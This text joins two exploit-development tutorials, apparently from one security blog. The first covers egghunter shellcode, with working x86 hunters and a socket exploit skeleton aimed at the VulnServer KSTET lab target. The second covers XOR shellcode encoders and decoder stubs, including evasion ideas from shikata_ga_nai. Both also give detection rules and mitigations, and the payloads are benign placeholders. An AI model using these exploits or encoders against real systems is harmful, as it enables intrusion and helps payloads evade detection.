Egghunters: Staged Payload Delivery When Buffer Space Is Tight
You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.
An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.
I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.
1. Why Egghunters Exist
The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.
The layout in memory looks like this:
small overflow buffer (~32-60B) elsewhere in the process
+---------------------------+ +-----------------------------+
| EGGHUNTER (the "hunter") | --scan-> | w00tw00t + full shellcode |
+---------------------------+ +-----------------------------+
finds the doubled tag, jmp to payloadTwo preconditions, both non-negotiable:
- At least ~32 reachable bytes to hold the hunter itself.
- The full payload must already be in memory when the hunter executes.
That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.
2. The Page-Walk Problem
x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.
The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses — it jumps straight to the next page boundary and probes again. Inside a valid page it advances one DWORD at a time looking for the tag.
The brief table of moving parts:
| Component | Detail |
|---|---|
| Memory iterator register | EDX holds the current scan address |
| Page-boundary jump | OR DX, 0x0FFF → end of page; INC EDX → start of next page |
| Validity probe | A syscall (or an SEH frame) tests whether the page is readable |
| Egg comparison | SCASD compares EAX to [EDI] and auto-increments EDI |
| Transfer to payload | JMP EDI once both halves of the egg match |

3. Anatomy of the Syscall Egghunter
The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.
; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
or dx, 0x0fff ; EDX -> last byte of current 4KB page
loop_inc_one:
inc edx ; advance one byte (rolls into next page)
loop_check:
push edx ; save scan pointer (clobbered by syscall)
push 0x2 ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
pop eax ; -> EAX = 0x2 *** verify per OS, see j00ru ***
int 0x2e ; legacy syscall gate
cmp al, 0x05 ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
pop edx ; restore scan pointer
je loop_inc_page ; bad page -> skip to next page boundary
is_egg:
mov eax, 0x74303077 ; "w00t"
mov edi, edx ; EDI = current address
scasd ; compare [EDI] to EAX, EDI += 4
jnz loop_inc_one ; first half mismatch -> keep scanning
scasd ; compare the *second* half of the egg
jnz loop_inc_one
matched:
jmp edi ; EDI now points just past the doubled tagTwo SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.
| Identifier | Value / Note |
|---|---|
| Syscall | NtAccessCheckAndAuditAlarm |
| Syscall number (x86 XP–7) | 0x02 |
| Invocation | INT 0x2E |
| Access-violation status | 0xC0000005 → CMP AL, 0x05 |
| Invalid-page action | JE loop_inc_page |
| Size | ~32 bytes |
Syscall numbers are OS-version specific.
0x02is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table atj00ru.vexillium.org/syscalls/nt/64/for your exact target build.
4. The SEH-Based Variant
Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.
; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
push handler ; EXCEPTION_REGISTRATION_RECORD.Handler
push dword [fs:0] ; .Next = current head of the SEH chain
mov [fs:0], esp ; install our frame as the new chain head
xor edx, edx ; scan pointer
scan_loop:
inc edx
mov edi, edx
mov eax, 0x74303077 ; "w00t"
scasd ; read [EDI]; faults route into 'handler'
jnz scan_loop
scasd ; confirm second half of the egg
jnz scan_loop
pop dword [fs:0] ; restore previous SEH frame
add esp, 4
jmp edi ; transfer to payload
handler: ; entered on STATUS_ACCESS_VIOLATION
; bump saved EDX in the CONTEXT past the bad page,
; return ExceptionContinueExecution, resume scan_loop
ret| Feature | Syscall variant | SEH variant |
|---|---|---|
| Size | ~32 bytes | ~60 bytes |
| Validity check | INT 0x2E → NtAccessCheckAndAuditAlarm | Custom FS:[0] handler |
| OS portability | Fragile (syscall # changes) | More portable |
| Detection surface | INT 0x2E is glaring | Quieter, but installs an SEH frame |
That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.
![Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.](https://genxcyber.com/wp-content/uploads/2026/06/egghunter-staged-payload-delivery-tight-buffer-2.png)
5. Egg Tags and Bad Characters
The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.
First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters — \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.
Second, and easy to forget: the tag must be unique in process memory ahead of the payload. If the 4-byte value appears anywhere before your real payload — including elsewhere in your own crafted buffer — the hunter may jump there first and execute garbage. Scan your buffer before sending:
def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
payload_at = buffer.find(tag * 2) # the real, doubled egg
earlier = buffer.find(tag) # any earlier single hit?
if earlier != -1 and earlier < payload_at:
print(f"[!] tag {tag!r} appears at offset {earlier} "
f"before the payload at {payload_at}")
return False
return TrueThe bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.
# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256)) # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".6. WoW64 and Windows 10
Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.
The CS segment selector reveals the mode — 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then far-calls through FS:[0xC0] to cross into 64-bit code.
; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
mov ebx, cs ; read code-segment selector
cmp bl, 0x23 ; 0x23 = 32-bit (WoW64) execution?
; ... stage 64-bit syscall args ...
mov bl, 0xc0
call dword [fs:ebx] ; far call via FS:[0xC0] -> 64-bit mode
cmp al, 0x05 ; STATUS_ACCESS_VIOLATION low byte
je loop_inc_pageThe Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.
7. Wiring It Into an SEH Overflow
A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.
[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
... and the egg-tagged full payload lives in a SEPARATE field/request ...#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999
egghunter = ( # 32-byte syscall hunter, tag "w00t"
b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90" # jmp +6 over the SEH record
seh = b"\x42\x42\x42\x42" # PLACEHOLDER pop/pop/ret (find per target)
egg = b"w00tw00t" # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc" # \xcc = test int3; swap for calc.exe popup in lab
trigger = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))
with socket.create_connection((RHOST, RPORT)) as s:
s.recv(1024)
s.send(b"KSTET " + payload + b"\r\n") # 1) stage the egg-tagged payload first
s.send(b"KSTET " + trigger + b"\r\n") # 2) THEN trigger overflow + run hunter
Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.
8. Lab: VulnServer KSTET
VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:
- Attach VulnServer in Immunity Debugger or x64dbg.
- Fuzz
KSTET, find the offset to SEH control with a cyclic pattern. - Locate a clean
POP/POP/RETin a non-/SAFESEH, non-ASLR module. - Generate the hunter with mona:
!mona egg -t w00t(add-cto encode out bad chars). Mona can emit both SEH-based andNtAccessCheckAndAuditAlarm-based hunters. - Set a breakpoint on the
SCASD(\xAF) opcode and single-step to watchEDImarch toward the egg — this is the moment that makes the mechanism click.
Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.
9. Detecting Egghunter Behavior
The hunter is loud if you’re listening. Two behavioral tells lead:
- A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
NtAccessCheckAndAuditAlarmfired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Baseline parent-child chain for the vulnerable service |
8 | CreateRemoteThread | Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules — a shellcode tell |
10 | ProcessAccess | Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002) |
25 | ProcessTampering | Sysmon 13+; in-memory image diverging from disk — hallmark of in-memory execution |
Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.
title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader
status: experimental
logsource:
product: windows
category: create_remote_thread # Sysmon Event ID 8
detection:
selection:
StartModule: ''
StartFunction: ''
condition: selection
level: highPair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.
YARA pins the syscall hunter’s opcode signature for memory forensics:
rule Egghunter_Syscall_x86 {
meta:
description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
author = "GenXCyber"
strings:
$page_walk = { 66 81 CA FF 0F } // or dx, 0x0fff
$syscall = { CD 2E } // int 0x2e
$av_check = { 3C 05 } // cmp al, 0x05
$scasd = { AF } // scasd
condition:
all of them and (@syscall - @page_walk) < 32
}10. Tools for Egghunter Analysis
| Tool | Description | Link |
|---|---|---|
| mona.py | Generates/verifies egghunters (!mona egg) in Immunity | corelan.be |
| Immunity Debugger | Classic exploit-dev debugger, mona host | immunityinc.com |
| x64dbg | Free user-mode debugger for stepping the scan | x64dbg.com |
| VulnServer | Safe, intentionally vulnerable practice target | github.com |
| Process Hacker | Spot the 100% CPU thread and handle access | processhacker.sourceforge.io |
| Sysmon | EID 8/10/25 telemetry for shellcode behavior | microsoft.com |
| j00ru syscall table | Authoritative per-OS syscall numbers | j00ru.vexillium.org |
| osed-scripts (epi052) | Egghunter generator and OSED helpers | github.com |
11. Mitigations and Modern Reality
Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.
| Mitigation | Effect on the technique |
|---|---|
| DEP / NX | Payload on stack/heap won’t execute; primary kill switch for legacy targets |
| ASLR | Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise |
| Control Flow Guard | Validates indirect targets; disrupts the final JMP EDI when enforced |
| GS / stack canaries | Don’t stop the hunter, but can stop the overflow that delivers it |
| App sandboxing | Limits post-execution blast radius |
The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.
12. MITRE ATT&CK Mapping
Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Service crash/recover, EID 1 anomalies |
| Process Injection | T1055 | Sysmon EID 8/10, TI ETW |
| Process Injection: DLL Injection | T1055.001 | EID 8 with empty StartModule |
| Reflective Code Loading | T1620 | In-memory PE, EID 25 ProcessTampering |
| Obfuscated Files or Information | T1027 | Encoded egg payload, YARA on decoder stubs |
| Sandbox Evasion: Time Based | T1497.003 | CPU-spike artifact in sandboxes |
Summary
- An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
- The hunter walks memory page-by-page (
OR DX, 0x0FFF), validates each page viaNtAccessCheckAndAuditAlarm/INT 0x2E(or an SEH frame), and confirms the egg with two consecutiveSCASDinstructions beforeJMP EDI. - The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
- Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
- Detect it via the
INT 0x2Eanomaly, rapidNtAccessCheckAndAuditAlarmbursts, Sysmon EID 8 threads with emptyStartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.
Related Tutorials
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Classic Stack Buffer Overflow: Smashing the Stack on Windows
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- The Basics of Exploit Development 3: Egg Hunters – Coalfire Blog
- Windows User Mode Exploit Development: Egghunter Part 3 – memN0ps
- Windows Exploit Development: Egg Hunting – Shellcode.Blog
- Metasploit Framework – Msf::Exploit::Remote::Egghunter Mixin (Source)
- OSED Scripts: Egghunter Generator (NtAccessCheckAndAuditAlarm & SEH variants) – epi052/osed-scripts
Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.
This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.
1. Why Shellcode Breaks: Bad Characters
A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.
| Byte | Name | Why it breaks things |
|---|---|---|
\x00 | NULL | Terminates C strings; strcpy/sprintf stop copying here |
\x0a | Line Feed | Read as end-of-input by line-oriented protocols and gets |
\x0d | Carriage Return | Paired with \x0a in HTTP/SMTP headers; often stripped |
\x20 | Space | Token delimiter in many parsers |
\xff | 0xFF | Sentinel / length markers in some binary protocols |
The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).
2. The XOR Contract
XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.
A ⊕ K ⊕ K = A| A | K | A ⊕ K |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |
There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.
The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.

3. Finding the Bad Chars
Before you encode anything, you enumerate what to avoid. The workflow is mechanical:
- Build a test pattern of all 256 byte values,
\x00through\xff, minus any you already know are bad. - Drop it into the vulnerable buffer and dump the buffer from memory.
- Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
- Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.
A small diff helper makes step 3 fast:
#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
for i, (e, r) in enumerate(zip(expected, received)):
if e != r:
return i, hex(e), hex(r) # index, sent, received
if len(expected) != len(received):
return min(len(expected), len(received)), "(truncated)", None
return None
# expected = bytes(range(0x01, 0x100)) # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))Truncation tells you something extra: the byte right before where the copy stopped is usually the terminator. Note it, exclude it, run again.
4. Building an XOR Encoder in Python
The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.
#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.
# Benign x86 stub: exit(0) (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}
def find_key(sc, bad):
for key in range(1, 256):
if key in bad:
continue
if all((b ^ key) not in bad for b in sc): # no encoded byte is bad
return key
return None
key = find_key(shellcode, bad_chars)
if key is None:
raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")
encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob = " + "".join(f"\\x{b:02x}" for b in encoded))If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.
5. The Decoder Stub in x86 (NASM)
The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.
section .text
global _start
_start:
jmp short get_payload ; (1) hop over the decoder to the CALL
decoder:
pop esi ; (3) ESI -> first encoded byte
xor ecx, ecx
mov cl, payload_len ; loop counter = payload length
decode_loop:
xor byte [esi], 0xAA ; (4) decode one byte, key = 0xAA
inc esi ; advance
loop decode_loop ; ECX--, repeat while non-zero
jmp payload ; (5) run the now-decoded shellcode
get_payload:
call decoder ; (2) pushes addr of `payload`, jumps back
payload:
db 0xcc, 0xcc, 0xcc ; <-- splice encoder output here
payload_len equ $ - payloadjmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.
Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, use the full mov ecx, payload_len and clear ECX with xor ecx, ecx first.
Build and extract:
nasm -f elf32 stub.asm -o stub.o
ld -m elf_i386 stub.o -o stub
objdump -d stub # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin # emit a C array of the bytesTo confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:
/* LAB ONLY — disposable VM, no network.
gcc -m32 -z execstack -fno-stack-protector test.c -o test */
#include <stdio.h>
unsigned char buf[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
printf("stub length: %zu\n", sizeof(buf) - 1);
((void(*)())buf)();
return 0;
}
6. The Stub Must Be Clean Too
This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.
So audit the stub bytes the same way you audit everything else:
#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32
def audit_stub(stub: bytes, bad: set):
md = Cs(CS_ARCH_X86, CS_MODE_32)
for ins in md.disasm(stub, 0x0):
raw = stub[ins.address:ins.address + ins.size]
hits = [hex(b) for b in raw if b in bad]
tag = f" <-- BAD {hits}" if hits else ""
print(f"{ins.address:04x} {ins.mnemonic:6} {ins.op_str}{tag}")When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax → \x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.
7. Per-Chunk Keyed Encoding
When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.
; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
mov al, [esi] ; AL = key for this chunk
inc esi ; ESI -> first data byte
xor byte [esi], al ; decode data byte 0
inc esi
xor byte [esi], al ; decode data byte 1
inc esi
cmp byte [esi], 0x90 ; end-marker (raw, unencoded NOP)?
jne decode_chunk
jmp payload_start ; first decoded byte| Scheme | Pro | Con |
|---|---|---|
| Fixed single key | Smallest stub; one xor per byte | Fails when bad-char set is dense |
| Per-chunk key | Survives tight bad-char sets | Larger blob (one key byte per chunk); bigger stub |
The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.
8. Stack-Based Decoding
In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.
decoder:
pop esi ; ESI -> encoded payload
sub esp, 0x200 ; reserve 512 bytes of scratch
mov edi, esp ; EDI -> destination buffer
xor edx, edx ; offset = 0
copy_decode:
mov al, [esi + edx] ; fetch encoded byte
cmp al, 0xcc ; raw end-marker?
je run
xor al, 0xaa ; decode with key
mov [edi + edx], al ; write to stack
inc edx
jmp copy_decode
run:
jmp edi ; execute decoded shellcode on the stackEDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).
9. shikata_ga_nai: the State of the Art
The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:
- Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
- Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like
fstenv [esp-0xc]to recoverEIPwithout a tell-taleCALL— a deliberate jab at emulators that don’t model the FPU.
You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.
10. Detection and Defense: What the Blue Team Sees
The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).
| Behavior | What it reveals |
|---|---|
Tight xor/inc/loop over a code region | Classic fixed-key decoder stub |
| Region transitions writable → executable | Decoded payload about to run |
| Execution from unbacked memory | Code with no file on disk behind it |
Sysmon Event IDs
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Loader/injector process spawn |
7 | Image Loaded | DLLs from temp/download paths into system processes |
8 | CreateRemoteThread | Thread created in another process — low-volume, high-signal |
10 | ProcessAccess | Cross-process memory access; inspect GrantedAccess and CallTrace |
25 | ProcessTampering | In-memory image diverges from disk (hollowing / in-memory decode) |
Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.
Sigma Rule
title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
product: windows
category: process_access
detection:
selection:
GrantedAccess:
- '0x147a'
- '0x1f3fff'
CallTrace|contains: 'UNKNOWN'
condition: selection
level: high
tags:
- attack.t1055A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
ETW providers
| Provider | Purpose |
|---|---|
Microsoft-Windows-Threat-Intelligence | Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs |
Microsoft-Windows-Security-Auditing | Event ID 4688 process creation with command line |
| AMSI | Inspects script content after deobfuscation, before execution |
Hardening
bcdedit /set nx AlwaysOn— system-wide DEP/NX blocks execution of decoded stack/heap output.- Arbitrary Code Guard (ACG) via
ProcessDynamicCodePolicy— forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode. - Code Integrity Guard (CIG) via
ProcessSignaturePolicy— blocks unsigned image loads. - Watch for
AmsiScanBufferpatching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting. - Scan for RWX and unbacked regions with
pe-sieve,Moneta, orHunt-Sleeping-Beacons— the residue a decoded payload leaves behind.

11. Tools
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86/x64 decoder stubs | nasm.us |
| GDB + pwndbg | Single-step the decode loop, inspect ESI/ECX | gdb.gnu.org |
| objdump / objcopy | Disassemble stubs, extract .text bytes | gnu.org |
| Capstone | Programmatic opcode audit for bad chars | capstone-engine.org |
| pwntools | Encoder/exploit automation (pwnlib.encoders) | docs.pwntools.com |
| pe-sieve / Moneta | Scan live processes for RWX / unbacked memory | github.com |
| Sysmon | Endpoint telemetry for Event IDs 8, 10, 25 | learn.microsoft.com |
12. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Obfuscated Files or Information | T1027 | Entropy/structure anomalies; encoded blob with decoder prefix |
| Encrypted/Encoded File | T1027.013 | Static scan for XOR-loop stub patterns near high-entropy data |
| Deobfuscate/Decode Files or Information | T1140 | Self-modifying memory; ACG violations; ETW VirtualProtect |
| Process Injection | T1055 | Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN |
| PE Injection | T1055.002 | Shellcode written into another process; RWX region creation |
| Reflective Code Loading | T1620 | Execution from unbacked memory; pe-sieve / Moneta |
Summary
- XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
- The decoder stub uses JMP-CALL-POP to find itself in memory, then loops
xor byte [esi], keyover the encoded payload and jumps in; aCLloop counter silently caps you at 255 bytes. - The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (
sub eax,eaxforxor eax,eax). - Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers;
shikata_ga_naiadds polymorphism so the encoded bytes never signature the same way twice. - Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory,
CallTrace: UNKNOWNon Sysmon Event ID10, and ACG/DEP violations on execution.
Related Tutorials
